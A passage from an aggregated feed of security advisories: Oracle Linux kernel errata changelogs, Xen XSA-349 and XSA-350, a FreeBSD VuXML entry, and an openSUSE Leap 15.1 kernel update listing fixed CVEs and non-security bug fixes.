tcpm: During PR_SWAP, source caps should be sent only after tSwapSourceStart (Badhri Jagan Sridharan) \n- media: platform: Improve queue set up flow for bug fixing (Xia Jiang) \n- media: videodev2.h: RGB BT2020 and HSV are always full range (Hans Verkuil) \n- drm/brige/megachips: Add checking if ge_b850v3_lvds_init() is working correctly (Nadezda Lutovinova) \n- ath10k: fix VHT NSS calculation when STBC is enabled (Sathishkumar Muruganandam) \n- ath10k: start recovery process when payload length exceeds max htc length for sdio (Wen Gong) \n- video: fbdev: pvr2fb: initialize variables (Tom Rix) \n- xfs: fix realtime bitmap/summary file truncation when growing rt volume (Darrick J. Wong) \n- ARM: 8997/2: hw_breakpoint: Handle inexact watchpoint addresses (Douglas Anderson) \n- um: change sigio_spinlock to a mutex (Johannes Berg) \n- f2fs: fix to check segment boundary during SIT page readahead (Chao Yu) \n- f2fs: add trace exit in exception path (Zhang Qilong) \n- sparc64: remove mm_cpumask clearing to fix kthread_use_mm race (Nicholas Piggin) \n- powerpc: select ARCH_WANT_IRQS_OFF_ACTIVATE_MM (Nicholas Piggin) \n- powerpc/powernv/smp: Fix spurious DBG() warning (Oliver O Halloran) \n- futex: Fix incorrect should_fail_futex() handling (Mateusz Nosek) \n- mlxsw: core: Fix use-after-free in mlxsw_emad_trans_finish() (Amit Cohen) \n- x86/unwind/orc: Fix inactive tasks with stack pointer in %sp on GCC 10 compiled kernels (Jiri Slaby) \n- fscrypt: return -EXDEV for incompatible rename or link into encrypted dir (Eric Biggers) \n- ata: sata_rcar: Fix DMA boundary mask (Geert Uytterhoeven) \n- mtd: lpddr: Fix bad logic in print_drs_error (Gustavo A. R. Silva) \n- p54: avoid accessing the data mapped to streaming DMA (Jia-Ju Bai) \n- fuse: fix page dereference after free (Miklos Szeredi) \n- x86/xen: disable Firmware First mode for correctable memory errors (Juergen Gross) \n- arch/x86/amd/ibs: Fix re-arming IBS Fetch (Kim Phillips) \n- tipc: fix memory leak caused by tipc_buf_append() (Tung Nguyen) \n- ravb: Fix bit fields checking in ravb_hwtstamp_get() (Andrew Gabbasov) \n- gtp: fix an use-before-init in gtp_newlink() (Masahiro Fujiwara) \n- efivarfs: Replace invalid slashes with exclamation marks in dentries. (Michael Schaller) \n- arm64: link with -z norelro regardless of CONFIG_RELOCATABLE (Nick Desaulniers) \n- scripts/setlocalversion: make git describe output more reliable (Rasmus Villemoes) \n- Btrfs: fix selftests failure due to uninitialized i_mode in test inodes (Filipe Manana) [Orabug: 31864725] {CVE-2019-19816}\n- btrfs: fix return value mixup in btrfs_get_extent (Pavel Machek) [Orabug: 31864725] {CVE-2019-19816}\n- btrfs: inode: Verify inode mode to avoid NULL pointer dereference (Qu Wenruo) [Orabug: 31864725] {CVE-2019-19816}\n- hv_netvsc: Set probe mode to sync (Haiyang Zhang) [Orabug: 32120118]", "modified": "2021-02-16T00:00:00", "published": "2021-02-16T00:00:00", "id": "ELSA-2021-9052", "href": "http://linux.oracle.com/errata/ELSA-2021-9052.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:20:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14351", "CVE-2020-14381", "CVE-2020-25705", "CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569"], "description": "[5.4.17-2036.102.0.2uek]\n- xen-blkback: set ring->xenblkd to NULL after kthread_stop() (Pawel Wieczorkiewicz) [Orabug: 32260252] {CVE-2020-29569}\n- xenbus/xenbus_backend: Disallow pending watch messages (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Count pending messages for each watch (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus/xen_bus_type: Support will_handle watch callback (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Add 'will_handle' callback support in xenbus_watch_path() (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n- xen/xenbus: Allow watches discard events before queueing (SeongJae Park) [Orabug: 32253409] {CVE-2020-29568}\n[5.4.17-2036.102.0.1uek]\n- target: fix XCOPY NAA identifier lookup (David Disseldorp) [Orabug: 32248035] {CVE-2020-28374}\n[5.4.17-2036.102.0uek]\n- futex: Fix inode life-time issue (Peter Zijlstra) [Orabug: 32233515] {CVE-2020-14381}\n- perf/core: Fix race in the perf_mmap_close() function (Jiri Olsa) [Orabug: 32233352] {CVE-2020-14351}\n- intel_idle: Customize IceLake server support (Chen Yu) [Orabug: 32218858] \n- dm crypt: Allow unaligned bio buffer lengths for skcipher devices (Sudhakar Panneerselvam) [Orabug: 32210418] \n- vhost scsi: fix lun reset completion handling (Mike Christie) [Orabug: 32167069] \n- vhost scsi: Add support for LUN resets. (Mike Christie) [Orabug: 32167069] \n- vhost scsi: add lun parser helper (Mike Christie) [Orabug: 32167069] \n- vhost scsi: fix cmd completion race (Mike Christie) [Orabug: 32167069] \n- vhost scsi: alloc cmds per vq instead of session (Mike Christie) [Orabug: 32167069] \n- vhost: Create accessors for virtqueues private_data (Eugenio Perez) [Orabug: 32167069] \n- vhost: add helper to check if a vq has been setup (Mike Christie) [Orabug: 32167069] \n- scsi: sd: Allow user to configure command retries (Mike Christie) [Orabug: 32167069] \n- scsi: core: Add limitless cmd retry support (Mike Christie) [Orabug: 32167069] \n- scsi: mpt3sas: Update driver version to 36.100.00.00 (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Handle trigger page after firmware update (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Add persistent MPI trigger page (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Add persistent SCSI sense trigger page (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Add persistent Event trigger page (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Add persistent Master trigger page (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Add persistent trigger pages support (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Sync time periodically between driver and firmware (Suganath Prabu S) [Orabug: 32242279] \n- scsi: mpt3sas: Bump driver version to 35.101.00.00 (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Add module parameter multipath_on_hba (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Handle vSES vphy object during HBA reset (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Add bypass_dirty_port_flag parameter (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Handling HBA vSES device (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Set valid PhysicalPort in SMPPassThrough (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Update hba_port objects after host reset (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Get sas_device objects using device's rphy (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Rename transport_del_phy_from_an_existing_port() (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Get device objects using sas_address & portID (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Update hba_port's sas_address & phy_mask (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Rearrange _scsih_mark_responding_sas_device() (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Allocate memory for hba_port objects (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Define hba_port structure (Sreekanth Reddy) [Orabug: 32242279] \n- scsi: mpt3sas: Fix ioctl timeout (Suganath Prabu S) [Orabug: 32242279] \n- icmp: randomize the global rate limiter (Eric Dumazet) [Orabug: 32227958] {CVE-2020-25705}\n- perf/x86/intel/uncore: Add box_offsets for free-running counters (Kan Liang) [Orabug: 32020885] \n- perf/x86/intel/uncore: Factor out __snr_uncore_mmio_init_box (Kan Liang) [Orabug: 32020885] \n- perf/x86/intel/uncore: Add Ice Lake server uncore support (Kan Liang) [Orabug: 32020885]", "modified": "2021-01-12T00:00:00", "published": "2021-01-12T00:00:00", "id": "ELSA-2021-9006", "href": "http://linux.oracle.com/errata/ELSA-2021-9006.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T20:21:01", "bulletinFamily": "unix", "cvelist": ["CVE-2020-12653", "CVE-2020-27786", "CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29660", "CVE-2020-36158"], "description": "[4.1.12-124.47.3]\n- sysctl: handle overflow in proc_get_long (Christian Brauner) [Orabug: 31588015]\n[4.1.12-124.47.2]\n- mwifiex: Fix possible buffer overflows in mwifiex_cmd_append_vsie_tlv() (Qing Xu) [Orabug: 31350932] {CVE-2020-12653}\n- lockd: don't use interval-based rebinding over TCP (Calum Mackay) [Orabug: 31435700] \n- ALSA: rawmidi: Fix racy buffer resize under concurrent accesses (Takashi Iwai) [Orabug: 32240688] {CVE-2020-27786}\n- xenbus/xenbus_backend: Disallow pending watch messages (SeongJae Park) [Orabug: 32247942] {CVE-2020-29568}\n- xen/xenbus: Count pending messages for each watch (SeongJae Park) [Orabug: 32247942] {CVE-2020-29568}\n- xen/xenbus/xen_bus_type: Support will_handle watch callback (SeongJae Park) [Orabug: 32247942] {CVE-2020-29568}\n- xen/xenbus: Add 'will_handle' callback support in xenbus_watch_path() (SeongJae Park) [Orabug: 32247942] {CVE-2020-29568}\n- xen/xenbus: Allow watches discard events before queueing (SeongJae Park) [Orabug: 32247942] {CVE-2020-29568}\n- KVM: x86: clflushopt should be treated as a no-op by emulation (David Edmondson) [Orabug: 32251907] \n- tty: Fix ->session locking (Jann Horn) [Orabug: 32266682] {CVE-2020-29660}\n- tty: Fix ->pgrp locking in tiocspgrp() (Jann Horn) [Orabug: 32266682] {CVE-2020-29660}\n- tty: core: Use correct spinlock flavor in tiocspgrp() (Peter Hurley) [Orabug: 32266682] {CVE-2020-29660}\n- mwifiex: Fix possible buffer overflows in mwifiex_cmd_802_11_ad_hoc_start (Zhang Xiaohui) [Orabug: 32349208] {CVE-2020-36158}\n[4.1.12-124.47.1]\n- target: fix XCOPY NAA identifier lookup (Mike Christie) [Orabug: 32374139] {CVE-2020-28374}", "modified": "2021-02-03T00:00:00", "published": "2021-02-03T00:00:00", "id": "ELSA-2021-9030", "href": "http://linux.oracle.com/errata/ELSA-2021-9030.html", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "xen": [{"lastseen": "2020-12-15T17:20:52", "bulletinFamily": "software", "cvelist": ["CVE-2020-29569"], "description": "#### ISSUE DESCRIPTION\nThe Linux kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped. However, the handler may not have time to run if the frontend quickly toggle between the states connect and disconnect.\nAs a consequence, the block backend may re-use a pointer after it was freed.\n#### IMPACT\nA misbehaving guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privileged escalation and information leak cannot be ruled out.\n#### VULNERABLE SYSTEMS\nSystems using Linux blkback are vulnerable. This includes most systems with a Linux dom0, or Linux driver domains.\nLinux versions containing a24fa22ce22a ("xen/blkback: don't use xen_blkif_get() in xen-blkback kthread"), or its backports, are vulnerable. This includes all current linux-stable branches back to at least linux-stable/linux-4.4.y.\nWhen the Xen PV block backend is provided by userspace (eg qemu), that backend is not vulnerable. So configurations where the xl.cfg domain configuration file specifies all disks with backendtype="qdisk" are not vulnerable.\nThe Linux blkback only supports raw format images, so when all disks have a format than format="raw", the system is not vulnerable.\n", "edition": 1, "modified": "2020-12-15T12:19:00", "published": "2020-12-15T12:00:00", "id": "XSA-350", "href": "http://xenbits.xen.org/xsa/advisory-350.html", "title": "Use after free triggered by block frontend in Linux blkback", "type": "xen", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-12-15T17:20:52", "bulletinFamily": "software", "cvelist": ["CVE-2020-29568"], "description": "#### ISSUE DESCRIPTION\nSome OSes (such as Linux, FreeBSD, NetBSD) are processing watch events using a single thread. If the events are received faster than the thread is able to handle, they will get queued.\nAs the queue is unbound, a guest may be able to trigger a OOM in the backend.\n#### IMPACT\nA malicious guest can trigger an OOM in backends.\n#### VULNERABLE SYSTEMS\nAll systems with a FreeBSD, Linux, NetBSD dom0 are vulnerable.\nAll version of those OSes are vulnerable.\n", "edition": 1, "modified": "2020-12-15T12:19:00", "published": "2020-12-15T12:00:00", "id": "XSA-349", "href": "http://xenbits.xen.org/xsa/advisory-349.html", "title": "Frontends can trigger OOM in Backends by update a watched path", "type": "xen", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2021-06-08T18:29:11", "bulletinFamily": "unix", "cvelist": ["CVE-2020-29568"], "description": "\nProblem Description:\nSome OSes (including Linux, FreeBSD, and NetBSD) are processing watch\n\tevents using a single thread. If the events are received faster than\n\tthe thread is able to handle, they will get queued.\nAs the queue is unbound, a guest may be able to trigger a OOM in\n\tthe backend.\n", "edition": 2, "modified": "2021-01-29T00:00:00", "published": "2021-01-29T00:00:00", "id": "5D91370B-61FD-11EB-B87A-901B0EF719AB", "href": "https://vuxml.freebsd.org/freebsd/5d91370b-61fd-11eb-b87a-901b0ef719ab.html", "title": "FreeBSD -- Xen guests can triger backend Out Of Memory", "type": "freebsd", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2021-07-25T00:12:26", "bulletinFamily": "unix", "cvelist": ["CVE-2019-20934", "CVE-2020-0444", "CVE-2020-0465", "CVE-2020-0466", "CVE-2020-11668", "CVE-2020-25639", "CVE-2020-27068", "CVE-2020-27777", "CVE-2020-27786", "CVE-2020-27825", "CVE-2020-28374", "CVE-2020-29568", "CVE-2020-29569", "CVE-2020-29660", "CVE-2020-29661", "CVE-2020-36158", "CVE-2020-4788"], "description": "An update that solves 17 vulnerabilities and has 62 fixes\n is now available.\n\nDescription:\n\n\n\n The openSUSE Leap 15.1 kernel was updated to receive various security and\n bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2020-29568: An issue was discovered in Xen through 4.14.x. Some OSes\n (such as Linux, FreeBSD, and NetBSD) are processing watch events using a\n single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may\n be able to trigger an OOM in the backend. All systems with a FreeBSD,\n Linux, or NetBSD (any version) dom0 are vulnerable (bnc#1179508).\n - CVE-2020-29569: The Linux kernel PV block backend expects the kernel\n thread handler to reset ring->xenblkd to NULL when stopped. However, the\n handler may not have time to run if the frontend quickly toggles between\n the states connect and disconnect. As a consequence, the block backend\n may re-use a pointer after it was freed. A misbehaving guest can trigger\n a dom0 crash by continuously connecting / disconnecting a block\n frontend. Privilege escalation and information leaks cannot be ruled\n out. This only affects systems with a Linux blkback (bnc#1179509).\n - CVE-2020-25639: Bail out of nouveau_channel_new if channel init fails\n (bsc#1176846).\n - CVE-2020-28374: In drivers/target/target_core_xcopy.c insufficient\n identifier checking in the LIO SCSI target code can be used by remote\n attackers to read or write files via directory traversal in an XCOPY\n request, aka CID-2896c93811e3. For example, an attack can occur over a\n network if the attacker has access to one iSCSI LUN. The attacker gains\n control over file access because I/O operations are proxied via an\n attacker-selected backstore (bnc#1178372 1180676).\n - CVE-2020-36158: mwifiex_cmd_802_11_ad_hoc_start in\n drivers/net/wireless/marvell/mwifiex/join.c might allow remote attackers\n to execute arbitrary code via a long SSID value, aka CID-5c455c5ab332\n (bnc#1180559).\n - CVE-2020-27825: A use-after-free flaw was found in\n kernel/trace/ring_buffer.c. There was a race problem in trace_open and\n resize of cpu buffer running parallely on different cpus, may cause a\n denial of service problem (DOS). This flaw could even allow a local\n attacker with special user privilege to a kernel information leak threat\n (bnc#1179960).\n - CVE-2020-0466: In do_epoll_ctl and ep_loop_check_proc of eventpoll.c,\n there is a possible use after free due to a logic error. This could lead\n to local escalation of privilege with no additional execution privileges\n needed. User interaction is not needed for exploitation (bnc#1180031).\n - CVE-2020-27068: In the nl80211_policy policy of nl80211.c, there is a\n possible out of bounds read due to a missing bounds check. This could\n lead to local information disclosure with System execution privileges\n needed. User interaction is not required for exploitation (bnc#1180086).\n - CVE-2020-0465: In various methods of hid-multitouch.c, there is a\n possible out of bounds write due to a missing bounds check. This could\n lead to local escalation of privilege with no additional execution\n privileges needed. User interaction is not needed for exploitation\n (bnc#1180029).\n - CVE-2020-0444: In audit_free_lsm_field of auditfilter.c, there is a\n possible bad kfree due to a logic error in audit_data_to_entry. This\n could lead to local escalation of privilege with no additional execution\n privileges needed. User interaction is not needed for exploitation\n (bnc#1180027).\n - CVE-2020-29660: A locking inconsistency issue was discovered in the tty\n subsystem of the Linux kernel drivers/tty/tty_io.c and\n drivers/tty/tty_jobctrl.c may have allowed a read-after-free attack\n against TIOCGSID, aka CID-c8bcd9c5be24 (bnc#1179745).\n - CVE-2020-29661: A locking issue was discovered in the tty subsystem of\n the Linux kernel drivers/tty/tty_jobctrl.c allowed a use-after-free\n attack against TIOCSPGRP, aka CID-54ffccbf053b (bnc#1179745).\n - CVE-2020-27777: A flaw was found in the way RTAS handled memory accesses\n in userspace to kernel communication. On a locked down (usually due to\n Secure Boot) guest system running on top of PowerVM or KVM hypervisors\n (pseries platform) a root like local user could use this flaw to further\n increase their privileges to that of a running kernel (bnc#1179107).\n - CVE-2020-11668: In the Linux kernel before 5.6.1,\n drivers/media/usb/gspca/xirlink_cit.c (aka the Xirlink camera USB\n driver) mishandled invalid descriptors, aka CID-a246b4d54770\n (bnc#1168952).\n - CVE-2019-20934: An issue was discovered in the Linux kernel On NUMA\n systems, the Linux fair scheduler has a use-after-free in\n show_numa_stats() because NUMA fault statistics are inappropriately\n freed, aka CID-16d51a590a8c (bnc#1179663).\n - CVE-2020-27786: A flaw was found in the Linux kernels implementation of\n MIDI, where an attacker with a local account and the permissions to\n issue an ioctl commands to midi devices, could trigger a use-after-free.\n A write to this specific memory while freed and before use could cause\n the flow of execution to change and possibly allow for memory corruption\n or privilege escalation (bnc#1179601).\n - CVE-2020-4788: IBM Power9 (AIX 7.1, 7.2, and VIOS 3.1) processors could\n allow a local user to obtain sensitive information from the data in the\n L1 cache under extenuating circumstances. IBM X-Force ID: 189296\n (bnc#1177666).\n\n The following non-security bugs were fixed:\n\n - ACPI: PNP: compare the string length in the matching_id() (git-fixes).\n - ACPICA: Disassembler: create buffer fields in ACPI_PARSE_LOAD_PASS1\n (git-fixes).\n - ACPICA: Do not increment operation_region reference counts for field\n units (git-fixes).\n - ALSA: ca0106: fix error code handling (git-fixes).\n - ALSA: ctl: allow TLV read operation for callback type of element in\n locked case (git-fixes).\n - ALSA: hda - Fix silent audio output and corrupted input on MSI X570-A\n PRO (git-fixes).\n - ALSA: hda/ca0132 - Change Input Source enum strings (git-fixes).\n - ALSA: hda/ca0132 - Fix AE-5 rear headphone pincfg (git-fixes).\n - ALSA: hda/generic: Add option to enforce preferred_dacs pairs\n (git-fixes).\n - ALSA: hda/hdmi: always check pin power status in i915 pin fixup\n (git-fixes).\n - ALSA: hda/realtek - Add new codec supported for ALC897 (git-fixes).\n - ALSA: hda/realtek - Couldn't detect Mic if booting with headset plugged\n (git-fixes).\n - ALSA: hda/realtek - Enable headset mic of ASUS Q524UQK with ALC255\n (git-fixes).\n - ALSA: hda/realtek: Add mute LED quirk to yet another HP x360 model\n (git-fixes).\n - ALSA: hda/realtek: Add some Clove SSID in the ALC293(ALC1220)\n (git-fixes).\n - ALSA: hda/realtek: Enable front panel headset LED on Lenovo ThinkStation\n P520 (git-fixes).\n - ALSA: hda/realtek: Enable headset of ASUS UX482EG & B9400CEA with ALC294\n (git-fixes).\n - ALSA: hda/via: Fix runtime PM for Clevo W35xSS (git-fixes).\n - ALSA: hda: Add NVIDIA codec IDs 9a & 9d through a0 to patch table\n (git-fixes).\n - ALSA: hda: Fix potential race in unsol event handler (git-fixes).\n - ALSA: hda: Fix regressions on clear and reconfig sysfs (git-fixes).\n - ALSA: info: Drop WARN_ON() from buffer NULL sanity check (git-fixes).\n - ALSA: isa/wavefront: prevent out of bounds write in ioctl (git-fixes).\n - ALSA: line6: Perform sanity check for each URB creation (git-fixes).\n - ALSA: pcm: Clear the full allocated memory at hw_params (git-fixes).\n - ALSA: pcm: oss: Fix a few more UBSAN fixes (git-fixes).\n - ALSA: pcm: oss: Fix potential out-of-bounds shift (git-fixes).\n - ALSA: pcm: oss: Remove superfluous WARN_ON() for mulaw sanity check\n (git-fixes).\n - ALSA: timer: Limit max amount of slave instances (git-fixes).\n - ALSA: usb-audio: Add delay quirk for H570e USB headsets (git-fixes).\n - ALSA: usb-audio: Add delay quirk for all Logitech USB devices\n (git-fixes).\n - ALSA: usb-audio: Add implicit feedback quirk for MODX (git-fixes).\n - ALSA: usb-audio: Add implicit feedback quirk for Qu-16 (git-fixes).\n - ALSA: usb-audio: Add implicit feedback quirk for Zoom UAC-2 (git-fixes).\n - ALSA: usb-audio: Add registration quirk for Kingston HyperX Cloud Alpha\n S (git-fixes).\n - ALSA: usb-audio: Add registration quirk for Kingston HyperX Cloud Flight\n S (git-fixes).\n - ALSA: usb-audio: Disable sample read check if firmware does not give\n back (git-fixes).\n - ALSA: usb-audio: Fix OOB access of mixer element list (git-fixes).\n - ALSA: usb-audio: Fix control 'access overflow' errors from chmap\n (git-fixes).\n - ALSA: usb-audio: Fix potential out-of-bounds shift (git-fixes).\n - ALSA: usb-audio: Fix race against the error recovery URB submission\n (git-fixes).\n - ALSA: usb-audio: US16x08: fix value count for level meters (git-fixes).\n - ALSA: usb-audio: add quirk for Denon DCD-1500RE (git-fixes).\n - ALSA: usb-audio: add quirk for Samsung USBC Headset (AKG) (git-fixes).\n - ALSA: usb-audio: add usb vendor id as DSD-capable for Khadas devices\n (git-fixes).\n - ASoC: arizona: Fix a wrong free in wm8997_probe (git-fixes).\n - ASoC: cx2072x: Fix doubly definitions of Playback and Capture streams\n (git-fixes).\n - ASoC: fsl_asrc_dma: Fix dma_chan leak when config DMA channel failed\n (git-fixes).\n - ASoC: jz4740-i2s: add missed checks for clk_get() (git-fixes).\n - ASoC: pcm3168a: The codec does not support S32_LE (git-fixes).\n - ASoC: pcm: DRAIN support reactivation (git-fixes).\n - ASoC: rt5677: Mark reg RT5677_PWR_ANLG2 as volatile (git-fixes).\n - ASoC: sti: fix possible sleep-in-atomic (git-fixes).\n - ASoC: wm8904: fix regcache handling (git-fixes).\n - ASoC: wm8998: Fix PM disable depth imbalance on error (git-fixes).\n - ASoC: wm_adsp: Do not generate kcontrols without READ flags (git-fixes).\n - ASoC: wm_adsp: remove \"ctl\" from list on error in\n wm_adsp_create_control() (git-fixes).\n - Avoid a GCC warning about \"/*\" within a comment.\n - Bluetooth: Fix advertising duplicated flags (git-fixes).\n - Bluetooth: Fix null pointer dereference in hci_event_packet()\n (git-fixes).\n - Bluetooth: Fix slab-out-of-bounds read in hci_le_direct_adv_report_evt()\n (git-fixes).\n - Bluetooth: add a mutex lock to avoid UAF in do_enale_set (git-fixes).\n - Bluetooth: btusb: Fix detection of some fake CSR controllers with a\n bcdDevice val of 0x0134 (git-fixes).\n - Drop a backported uvcvideo patch that caused a regression (bsc#1180117)\n Also blacklisting the commit\n - EDAC/amd64: Fix PCI component registration (bsc#1112178).\n - HID: Add another Primax PIXART OEM mouse quirk (git-fixes).\n - HID: Fix slab-out-of-bounds read in hid_field_extract (bsc#1180052).\n - HID: Improve Windows Precision Touchpad detection (git-fixes).\n - HID: apple: Disable Fn-key key-re-mapping on clone keyboards (git-fixes).\n - HID: core: Correctly handle ReportSize being zero (git-fixes).\n - HID: core: check whether Usage Page item is after Usage ID items\n (git-fixes).\n - HID: cypress: Support Varmilo Keyboards' media hotkeys (git-fixes).\n - HID: hid-sensor-hub: Fix issue with devices with no report ID\n (git-fixes).\n - HID: intel-ish-hid: fix wrong error handling in ishtp_cl_alloc_tx_ring()\n (git-fixes).\n - HID: logitech-hidpp: Silence intermittent get_battery_capacity errors\n (git-fixes).\n - HSI: omap_ssi: Do not jump to free ID in ssi_add_controller()\n (git-fixes).\n - Input: ads7846 - fix integer overflow on Rt calculation (git-fixes).\n - Input: ads7846 - fix race that causes missing releases (git-fixes).\n - Input: ads7846 - fix unaligned access on 7845 (git-fixes).\n - Input: atmel_mxt_ts - disable IRQ across suspend (git-fixes).\n - Input: cm109 - do not stomp on control URB (git-fixes).\n - Input: cros_ec_keyb - send 'scancodes' in addition to key events\n (git-fixes).\n - Input: cyapa_gen6 - fix out-of-bounds stack access (git-fixes).\n - Input: goodix - add upside-down quirk for Teclast X98 Pro tablet\n (git-fixes).\n - Input: i8042 - add Acer laptops to the i8042 reset list (git-fixes).\n - Input: i8042 - add ByteSpeed touchpad to noloop table (git-fixes).\n - Input: i8042 - add Entroware Proteus EL07R4 to nomux and reset lists\n (git-fixes).\n - Input: i8042 - allow insmod to succeed on devices without an i8042\n controller (git-fixes).\n - Input: i8042 - fix error return code in i8042_setup_aux() (git-fixes).\n - Input: omap4-keypad - fix runtime PM error handling (git-fixes).\n - Input: synaptics - enable InterTouch for ThinkPad X1E 1st gen\n (git-fixes).\n - Input: trackpoint - add new trackpoint variant IDs (git-fixes).\n - Input: trackpoint - enable Synaptics trackpoints (git-fixes).\n - Input: xpad - support Ardwiino Controllers (git-fixes).\n - KVM: x86: reinstate vendor-agnostic check on SPEC_CTRL cpuid bits\n (bsc#1112178).\n - NFC: st95hf: Fix memleak in st95hf_in_send_cmd (git-fixes).\n - NFS: fix nfs_path in case of a rename retry (git-fixes).\n - NFSD: Add missing NFSv2 .pc_func methods (git-fixes).\n - NFSv4.2: fix client's attribute cache management for copy_file_range\n (git-fixes).\n - NFSv4.2: support EXCHGID4_FLAG_SUPP_FENCE_OPS 4.2 EXCHANGE_ID flag\n (git-fixes).\n - PCI/ASPM: Allow ASPM on links to PCIe-to-PCI/PCI-X Bridges (git-fixes).\n - PCI/ASPM: Disable ASPM on ASMedia ASM1083/1085 PCIe-to-PCI bridge\n (git-fixes).\n - PCI: Do not disable decoding when mmio_always_on is set (git-fixes).\n - PCI: Fix pci_slot_release() NULL pointer dereference (git-fixes).\n - PM / hibernate: memory_bm_find_bit(): Tighten node optimisation\n (git-fixes).\n - PM: ACPI: Output correct message on target power state (git-fixes).\n - PM: hibernate: Freeze kernel threads in software_resume() (git-fixes).\n - PM: hibernate: remove the bogus call to get_gendisk() in\n software_resume() (git-fixes).\n - Revert \"ACPI / resources: Use AE_CTRL_TERMINATE to terminate resources\n walks\" (git-fixes).\n - Revert \"ALSA: hda - Fix silent audio output and corrupted input on MSI\n X570-A PRO\" (git-fixes).\n - Revert \"PM / devfreq: Modify the device name as devfreq(X) for sysfs\"\n (git-fixes).\n - Revert \"device property: Keep secondary firmware node secondary by type\"\n (git-fixes).\n - Revert \"platform/x86: wmi: Destroy on cleanup rather than unregister\"\n (git-fixes).\n - Revert \"powerpc/pseries/hotplug-cpu: Remove double free in error path\"\n (bsc#1065729).\n - Revert \"serial: amba-pl011: Make sure we initialize the port.lock\n spinlock\" (git-fixes).\n - SMB3: Honor 'handletimeout' flag for multiuser mounts (bsc#1176558).\n - SMB3: Honor 'posix' flag for multiuser mounts (bsc#1176559).\n - SMB3: Honor lease disabling for multiuser mounts (git-fixes).\n - SUNRPC: Properly set the @subbuf parameter of xdr_buf_subsegment()\n (git-fixes).\n - SUNRPC: The RDMA back channel mustn't disappear while requests are\n outstanding (git-fixes).\n - USB: Fix: Do not skip endpoint descriptors with maxpacket=0 (git-fixes).\n - USB: Skip endpoints with 0 maxpacket length (git-fixes).\n - USB: UAS: introduce a quirk to set no_write_same (git-fixes).\n - USB: add RESET_RESUME quirk for Snapscan 1212 (git-fixes).\n - USB: dummy-hcd: Fix uninitialized array use in init() (git-fixes).\n - USB: gadget: f_acm: add support for SuperSpeed Plus (git-fixes).\n - USB: gadget: f_midi: setup SuperSpeed Plus descriptors (git-fixes).\n - USB: gadget: f_rndis: fix bitrate for SuperSpeed and above (git-fixes).\n - USB: gadget: legacy: fix return error code in acm_ms_bind() (git-fixes).\n - USB: ldusb: use unsigned size format specifiers (git-fixes).\n - USB: serial: ch341: add new Product ID for CH341A (git-fixes).\n - USB: serial: ch341: sort device-id entries (git-fixes).\n - USB: serial: digi_acceleport: clean up modem-control handling\n (git-fixes).\n - USB: serial: digi_acceleport: clean up set_termios (git-fixes).\n - USB: serial: digi_acceleport: fix write-wakeup deadlocks (git-fixes).\n - USB: serial: digi_acceleport: remove in_interrupt() usage.\n - USB: serial: digi_acceleport: remove redundant assignment to pointer\n priv (git-fixes).\n - USB: serial: digi_acceleport: rename tty flag variable (git-fixes).\n - USB: serial: digi_acceleport: use irqsave() in USB's complete callback\n (git-fixes).\n - USB: serial: iuu_phoenix: fix DMA from stack (git-fixes).\n - USB: serial: keyspan_pda: fix dropped unthrottle interrupts (git-fixes).\n - USB: serial: keyspan_pda: fix stalled writes (git-fixes).\n - USB: serial: keyspan_pda: fix tx-unthrottle use-after-free (git-fixes).\n - USB: serial: keyspan_pda: fix write deadlock (git-fixes).\n - USB: serial: keyspan_pda: fix write unthrottling (git-fixes).\n - USB: serial: keyspan_pda: fix write-wakeup use-after-free (git-fixes).\n - USB: serial: kl5kusb105: fix memleak on open (git-fixes).\n - USB: serial: mos7720: fix parallel-port state restore (git-fixes).\n - USB: serial: option: add Fibocom NL668 variants (git-fixes).\n - USB: serial: option: add interface-number sanity check to flag handling\n (git-fixes).\n - USB: serial: option: add support for Thales Cinterion EXS82 